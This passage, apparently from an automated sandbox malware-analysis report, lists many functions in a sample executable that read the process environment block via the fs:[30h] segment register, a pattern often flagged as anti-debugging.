                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116A470 mov eax, dword ptr fs:[00000030h]6_2_0116A470
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CC460 mov ecx, dword ptr fs:[00000030h]6_2_011CC460
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011FA49A mov eax, dword ptr fs:[00000030h]6_2_011FA49A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011744B0 mov ecx, dword ptr fs:[00000030h]6_2_011744B0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CA4B0 mov eax, dword ptr fs:[00000030h]6_2_011CA4B0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011464AB mov eax, dword ptr fs:[00000030h]6_2_011464AB
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011404E5 mov ecx, dword ptr fs:[00000030h]6_2_011404E5
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01140710 mov eax, dword ptr fs:[00000030h]6_2_01140710
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01170710 mov eax, dword ptr fs:[00000030h]6_2_01170710
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117C700 mov eax, dword ptr fs:[00000030h]6_2_0117C700
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117273C mov eax, dword ptr fs:[00000030h]6_2_0117273C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117273C mov ecx, dword ptr fs:[00000030h]6_2_0117273C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117273C mov eax, dword ptr fs:[00000030h]6_2_0117273C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BC730 mov eax, dword ptr fs:[00000030h]6_2_011BC730
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117C720 mov eax, dword ptr fs:[00000030h]6_2_0117C720
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117C720 mov eax, dword ptr fs:[00000030h]6_2_0117C720
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CE75D mov eax, dword ptr fs:[00000030h]6_2_011CE75D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01140750 mov eax, dword ptr fs:[00000030h]6_2_01140750
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182750 mov eax, dword ptr fs:[00000030h]6_2_01182750
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182750 mov eax, dword ptr fs:[00000030h]6_2_01182750
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C4755 mov eax, dword ptr fs:[00000030h]6_2_011C4755
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117674D mov esi, dword ptr fs:[00000030h]6_2_0117674D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117674D mov eax, dword ptr fs:[00000030h]6_2_0117674D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117674D mov eax, dword ptr fs:[00000030h]6_2_0117674D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01148770 mov eax, dword ptr fs:[00000030h]6_2_01148770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150770 mov eax, dword ptr fs:[00000030h]6_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E678E mov eax, dword ptr fs:[00000030h]6_2_011E678E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011407AF mov eax, dword ptr fs:[00000030h]6_2_011407AF
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011F47A0 mov eax, dword ptr fs:[00000030h]6_2_011F47A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114C7C0 mov eax, dword ptr fs:[00000030h]6_2_0114C7C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C07C3 mov eax, dword ptr fs:[00000030h]6_2_011C07C3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011447FB mov eax, dword ptr fs:[00000030h]6_2_011447FB
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011447FB mov eax, dword ptr fs:[00000030h]6_2_011447FB
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011627ED mov eax, dword ptr fs:[00000030h]6_2_011627ED
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011627ED mov eax, dword ptr fs:[00000030h]6_2_011627ED
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011627ED mov eax, dword ptr fs:[00000030h]6_2_011627ED
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CE7E1 mov eax, dword ptr fs:[00000030h]6_2_011CE7E1
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182619 mov eax, dword ptr fs:[00000030h]6_2_01182619
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE609 mov eax, dword ptr fs:[00000030h]6_2_011BE609
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115260B mov eax, dword ptr fs:[00000030h]6_2_0115260B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115260B mov eax, dword ptr fs:[00000030h]6_2_0115260B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115260B mov eax, dword ptr fs:[00000030h]6_2_0115260B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115260B mov eax, dword ptr fs:[00000030h]6_2_0115260B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115260B mov eax, dword ptr fs:[00000030h]6_2_0115260B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115260B mov eax, dword ptr fs:[00000030h]6_2_0115260B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115260B mov eax, dword ptr fs:[00000030h]6_2_0115260B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115E627 mov eax, dword ptr fs:[00000030h]6_2_0115E627
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01176620 mov eax, dword ptr fs:[00000030h]6_2_01176620
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01178620 mov eax, dword ptr fs:[00000030h]6_2_01178620
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114262C mov eax, dword ptr fs:[00000030h]6_2_0114262C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120866E mov eax, dword ptr fs:[00000030h]6_2_0120866E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120866E mov eax, dword ptr fs:[00000030h]6_2_0120866E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115C640 mov eax, dword ptr fs:[00000030h]6_2_0115C640
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01172674 mov eax, dword ptr fs:[00000030h]6_2_01172674
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117A660 mov eax, dword ptr fs:[00000030h]6_2_0117A660
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117A660 mov eax, dword ptr fs:[00000030h]6_2_0117A660
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01144690 mov eax, dword ptr fs:[00000030h]6_2_01144690
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01144690 mov eax, dword ptr fs:[00000030h]6_2_01144690
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011766B0 mov eax, dword ptr fs:[00000030h]6_2_011766B0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117C6A6 mov eax, dword ptr fs:[00000030h]6_2_0117C6A6
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117A6C7 mov ebx, dword ptr fs:[00000030h]6_2_0117A6C7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117A6C7 mov eax, dword ptr fs:[00000030h]6_2_0117A6C7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE6F2 mov eax, dword ptr fs:[00000030h]6_2_011BE6F2
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE6F2 mov eax, dword ptr fs:[00000030h]6_2_011BE6F2
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE6F2 mov eax, dword ptr fs:[00000030h]6_2_011BE6F2
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE6F2 mov eax, dword ptr fs:[00000030h]6_2_011BE6F2
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C06F1 mov eax, dword ptr fs:[00000030h]6_2_011C06F1
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C06F1 mov eax, dword ptr fs:[00000030h]6_2_011C06F1
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01138918 mov eax, dword ptr fs:[00000030h]6_2_01138918
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01138918 mov eax, dword ptr fs:[00000030h]6_2_01138918
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CC912 mov eax, dword ptr fs:[00000030h]6_2_011CC912
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE908 mov eax, dword ptr fs:[00000030h]6_2_011BE908
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE908 mov eax, dword ptr fs:[00000030h]6_2_011BE908
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C892A mov eax, dword ptr fs:[00000030h]6_2_011C892A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D892B mov eax, dword ptr fs:[00000030h]6_2_011D892B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C0946 mov eax, dword ptr fs:[00000030h]6_2_011C0946
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CC97C mov eax, dword ptr fs:[00000030h]6_2_011CC97C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01214940 mov eax, dword ptr fs:[00000030h]6_2_01214940
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E4978 mov eax, dword ptr fs:[00000030h]6_2_011E4978
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E4978 mov eax, dword ptr fs:[00000030h]6_2_011E4978
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01166962 mov eax, dword ptr fs:[00000030h]6_2_01166962
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01166962 mov eax, dword ptr fs:[00000030h]6_2_01166962
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01166962 mov eax, dword ptr fs:[00000030h]6_2_01166962
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0118096E mov eax, dword ptr fs:[00000030h]6_2_0118096E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0118096E mov edx, dword ptr fs:[00000030h]6_2_0118096E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0118096E mov eax, dword ptr fs:[00000030h]6_2_0118096E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C89B3 mov esi, dword ptr fs:[00000030h]6_2_011C89B3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C89B3 mov eax, dword ptr fs:[00000030h]6_2_011C89B3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C89B3 mov eax, dword ptr fs:[00000030h]6_2_011C89B3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A0 mov eax, dword ptr fs:[00000030h]6_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011409AD mov eax, dword ptr fs:[00000030h]6_2_011409AD
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011409AD mov eax, dword ptr fs:[00000030h]6_2_011409AD
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114A9D0 mov eax, dword ptr fs:[00000030h]6_2_0114A9D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114A9D0 mov eax, dword ptr fs:[00000030h]6_2_0114A9D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114A9D0 mov eax, dword ptr fs:[00000030h]6_2_0114A9D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114A9D0 mov eax, dword ptr fs:[00000030h]6_2_0114A9D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114A9D0 mov eax, dword ptr fs:[00000030h]6_2_0114A9D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114A9D0 mov eax, dword ptr fs:[00000030h]6_2_0114A9D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011749D0 mov eax, dword ptr fs:[00000030h]6_2_011749D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D69C0 mov eax, dword ptr fs:[00000030h]6_2_011D69C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011729F9 mov eax, dword ptr fs:[00000030h]6_2_011729F9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011729F9 mov eax, dword ptr fs:[00000030h]6_2_011729F9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120A9D3 mov eax, dword ptr fs:[00000030h]6_2_0120A9D3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CE9E0 mov eax, dword ptr fs:[00000030h]6_2_011CE9E0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CC810 mov eax, dword ptr fs:[00000030h]6_2_011CC810
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01162835 mov eax, dword ptr fs:[00000030h]6_2_01162835
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01162835 mov eax, dword ptr fs:[00000030h]6_2_01162835
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01162835 mov eax, dword ptr fs:[00000030h]6_2_01162835
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01162835 mov ecx, dword ptr fs:[00000030h]6_2_01162835
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01162835 mov eax, dword ptr fs:[00000030h]6_2_01162835
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01162835 mov eax, dword ptr fs:[00000030h]6_2_01162835
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E483A mov eax, dword ptr fs:[00000030h]6_2_011E483A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E483A mov eax, dword ptr fs:[00000030h]6_2_011E483A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117A830 mov eax, dword ptr fs:[00000030h]6_2_0117A830
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01170854 mov eax, dword ptr fs:[00000030h]6_2_01170854
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01144859 mov eax, dword ptr fs:[00000030h]6_2_01144859
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01144859 mov eax, dword ptr fs:[00000030h]6_2_01144859
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01152840 mov ecx, dword ptr fs:[00000030h]6_2_01152840
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D6870 mov eax, dword ptr fs:[00000030h]6_2_011D6870
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D6870 mov eax, dword ptr fs:[00000030h]6_2_011D6870
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CE872 mov eax, dword ptr fs:[00000030h]6_2_011CE872
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CE872 mov eax, dword ptr fs:[00000030h]6_2_011CE872
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CC89D mov eax, dword ptr fs:[00000030h]6_2_011CC89D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01140887 mov eax, dword ptr fs:[00000030h]6_2_01140887
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120A8E4 mov eax, dword ptr fs:[00000030h]6_2_0120A8E4
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116E8C0 mov eax, dword ptr fs:[00000030h]6_2_0116E8C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_012108C0 mov eax, dword ptr fs:[00000030h]6_2_012108C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117C8F9 mov eax, dword ptr fs:[00000030h]6_2_0117C8F9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117C8F9 mov eax, dword ptr fs:[00000030h]6_2_0117C8F9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BEB1D mov eax, dword ptr fs:[00000030h]6_2_011BEB1D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01208B28 mov eax, dword ptr fs:[00000030h]6_2_01208B28
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01208B28 mov eax, dword ptr fs:[00000030h]6_2_01208B28
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01214B00 mov eax, dword ptr fs:[00000030h]6_2_01214B00
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116EB20 mov eax, dword ptr fs:[00000030h]6_2_0116EB20
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116EB20 mov eax, dword ptr fs:[00000030h]6_2_0116EB20
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01138B50 mov eax, dword ptr fs:[00000030h]6_2_01138B50
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EEB50 mov eax, dword ptr fs:[00000030h]6_2_011EEB50
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011F4B4B mov eax, dword ptr fs:[00000030h]6_2_011F4B4B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011F4B4B mov eax, dword ptr fs:[00000030h]6_2_011F4B4B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E8B42 mov eax, dword ptr fs:[00000030h]6_2_011E8B42
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D6B40 mov eax, dword ptr fs:[00000030h]6_2_011D6B40
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D6B40 mov eax, dword ptr fs:[00000030h]6_2_011D6B40
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120AB40 mov eax, dword ptr fs:[00000030h]6_2_0120AB40
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0113CB7E mov eax, dword ptr fs:[00000030h]6_2_0113CB7E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01212B57 mov eax, dword ptr fs:[00000030h]6_2_01212B57
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01212B57 mov eax, dword ptr fs:[00000030h]6_2_01212B57
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01212B57 mov eax, dword ptr fs:[00000030h]6_2_01212B57
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01212B57 mov eax, dword ptr fs:[00000030h]6_2_01212B57
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150BBE mov eax, dword ptr fs:[00000030h]6_2_01150BBE
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150BBE mov eax, dword ptr fs:[00000030h]6_2_01150BBE
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011F4BB0 mov eax, dword ptr fs:[00000030h]6_2_011F4BB0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011F4BB0 mov eax, dword ptr fs:[00000030h]6_2_011F4BB0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EEBD0 mov eax, dword ptr fs:[00000030h]6_2_011EEBD0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01140BCD mov eax, dword ptr fs:[00000030h]6_2_01140BCD
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01140BCD mov eax, dword ptr fs:[00000030h]6_2_01140BCD
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01140BCD mov eax, dword ptr fs:[00000030h]6_2_01140BCD
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01160BCB mov eax, dword ptr fs:[00000030h]6_2_01160BCB
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01160BCB mov eax, dword ptr fs:[00000030h]6_2_01160BCB
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01160BCB mov eax, dword ptr fs:[00000030h]6_2_01160BCB
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01148BF0 mov eax, dword ptr fs:[00000030h]6_2_01148BF0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01148BF0 mov eax, dword ptr fs:[00000030h]6_2_01148BF0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01148BF0 mov eax, dword ptr fs:[00000030h]6_2_01148BF0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116EBFC mov eax, dword ptr fs:[00000030h]6_2_0116EBFC
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CCBF0 mov eax, dword ptr fs:[00000030h]6_2_011CCBF0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CCA11 mov eax, dword ptr fs:[00000030h]6_2_011CCA11
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01164A35 mov eax, dword ptr fs:[00000030h]6_2_01164A35
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01164A35 mov eax, dword ptr fs:[00000030h]6_2_01164A35
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117CA38 mov eax, dword ptr fs:[00000030h]6_2_0117CA38
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117CA24 mov eax, dword ptr fs:[00000030h]6_2_0117CA24
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116EA2E mov eax, dword ptr fs:[00000030h]6_2_0116EA2E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01146A50 mov eax, dword ptr fs:[00000030h]6_2_01146A50
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01146A50 mov eax, dword ptr fs:[00000030h]6_2_01146A50
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01146A50 mov eax, dword ptr fs:[00000030h]6_2_01146A50
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01146A50 mov eax, dword ptr fs:[00000030h]6_2_01146A50
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01146A50 mov eax, dword ptr fs:[00000030h]6_2_01146A50
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01146A50 mov eax, dword ptr fs:[00000030h]6_2_01146A50
